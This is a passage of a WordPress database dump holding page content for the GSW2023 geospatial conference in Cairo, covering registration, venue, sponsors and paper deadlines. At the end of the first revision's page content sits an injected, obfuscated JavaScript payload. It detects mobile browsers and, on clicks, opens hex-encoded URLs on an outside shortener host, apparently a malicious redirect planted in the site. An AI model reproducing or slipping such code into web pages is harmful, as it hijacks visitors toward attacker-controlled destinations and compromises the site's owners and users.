width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:53:20','2023-04-02 01:53:20','',3066,'https://gsw2023.com/?p=3996',0,'revision','',0),
(3997,1,'2023-04-02 01:56:12','2023-04-02 01:56:12','','Logo_Schriftzug_rgb_R','','inherit','open','closed','','logo_schriftzug_rgb_r','','','2023-04-02 01:56:12','2023-04-02 01:56:12','',3066,'https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R.png',0,'attachment','image/png',0),
(3998,1,'2023-04-02 01:57:16','2023-04-02 01:57:16','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400344244{margin-top: 95px !important;}\"]&nbsp;</p>\n<p><img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]</p>\n<h6></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400614804{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h3>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"]&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" 